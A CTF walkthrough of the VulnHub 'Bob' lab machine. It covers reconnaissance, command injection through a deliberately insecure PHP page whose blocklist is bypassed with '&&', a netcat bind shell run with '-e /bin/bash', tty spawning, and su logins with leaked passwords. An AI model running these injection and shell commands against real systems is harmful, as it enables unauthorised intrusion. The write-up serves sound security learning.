This article is a walkthrough on how I solved Bob CTF challenge. You can download Bob CTF via this link: https://www.vulnhub.com/entry/bob-101,226/.
It is a Beginner to intermediate challenge and at the end we have to gain the root access and get the flag.
So let’s do this:
To find the vulnerable machines through your attacking machine: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/
I used netdiscover to get the ipaddress of Bob Virtual machine. In my case, The ip address is 192.168.0.107.
netdiscover -r 192.168.0.1/24
I scanned the host with nmapand discovered this:
So 80 and 21 are open. I visited their website.
It is under construction. Couldn’t find much of the information with source code too. So, I fired up nikto to get more info:
nikto -h 192.168.0.107
It says robots.txt is present.
Really who made this file at least get a hash of your password to display, hackers can’t do anything with a hash, this is probably why we had a security breach in the first place. Comeon people this is basic 101 security! I have moved the file off the server. Don’t make me have to clean up the mess everytime someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob
login.php and lat_memo.html also doesn’t contain much information. Then, I turned to dev_shell.php:
Seems like the admin gave us a command injection platform. I used a lot of commands here but I will only give the useful ones in this article.
I tried ls as my first command.
But it isn’t seem to work so I used stacked approach to see if that works and it does work:
cd . &&ls -a gave me the above result. When I looked in the same directory in which I am. I found 2 important files: .hint and dev_shell.bak
I downloaded dev_shell.bak. It has the following code:
<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST[‘in_command’]);
$bad_words = array(“pwd”, “ls”, “netcat”, “ssh”, “wget”, “ping”, “traceroute”, “cat”, “nc”);
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<div id=”shell”>
<h2>
dev_shell
</h2>
<form action=”dev_shell.php” method=”post”>
Command: <input type=”text” name=”in_command” /> <br>
<input type=”submit” value=”submit”>
</form>
<br>
<h5>Output:</h5>
<?php
system(“running command…”);
//executes system Command
//checks for sneaky ;
if (strpos($command, ‘;’) !==false){
system(“echo Nice try skid, but you will never get through this bulletproof php code”); //doesn’t work 😛
}
else{
$is_he_a_bad_man = explode(‘ ‘, trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system(“echo Get out skid lol”);
}
else{
system($_POST[‘in_command’]);
}
}
?>
It’s simply an input sanitize script which seems to trim commands given in the array. Now, I know why ls command was not working. 😛
the .hint file which is a hidden file have following text:
No, I haven’t tried spawning a tty shell till yet. So let’s spawn a shell:
netcat cheat sheet came to rescue. With the above php script, I gathered that nc is installed and I can use it to open a bind shell on any port. I used
cd .&&nc -l -p 3333 -e /bin/bash
and then on my kali os, I used this command: nc 192.168.0.107 3333
and I got a shell. This is not a real shell so I spawned a bash shell using:
python -c ‘import tty;tty.spawn(“/bin/bash”)’
once, I got the real shell I checked for hidden files. I check the home directory and found that this vm has 4 users: bob,elliot,jc,seb. I check the elliot directory first and Lands on to this file theadminisdumb.txt which said:
with this I knew that elliot is not an admin but the bob is. It also gives information about the password of James [who is jc] which is Qwerty and Elliot’s password which is theadminisdumb. So I tried logging in
su elliot //password: theadminisdumb doesn’t work
su james //password: Qwerty works
Now, I traversed the directory for Bob and found a hidden file: .old_passwordfile.html which gave me the password for sebastian [user seb] which is T1tanium_Pa$$word_Hack3rs_Fear_M3.
su seb //password works 😉
So, now I need to know the password for Bob, elliot’s password is not required since he is not the admin here. So I searched the bob’s directory for any password file and I landed on to Downloads.
I further searched the Documents directory where I came across these files: login.txt.gpg [I overlooked this file as jpg before 😛 and then I saw it again]
Secret [I overlooked login.txt.gpg for this folder. ;p]
and then staff.txt which doesn’t contain much information.
I went to secret folder and at the end of it found notes.sh and I opened it.
So I went back and started looking again, all frustrated!!
I found the flag.txt which is in cd / directory. But I can’t open it unless I am root.
Remember the file login.txt.gpg ? That’s my last queue!
I google .gpg and found this:
GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh).
login.txt.gpg is an encrypted file and I need a passphrase to decrypt it and I only got “HARPOCRATES” which I found in Bob’s directories.
So I tried gpg -d login.txt.gpg on console but it is not giving a prompt for the passphrase entry. Another problem!
Found about the batch mode where in you can pass the decryption key with commandline itself.
gpg –batch –passphrase HARPOCRATES –decrypt login.txt.gpg
the password for bob is b0bcat_
I logged in as bob but I still can’t access the flag.txt file, it gave me this output when I cat /flag.txt
That’s it for now!
Ciao 🙂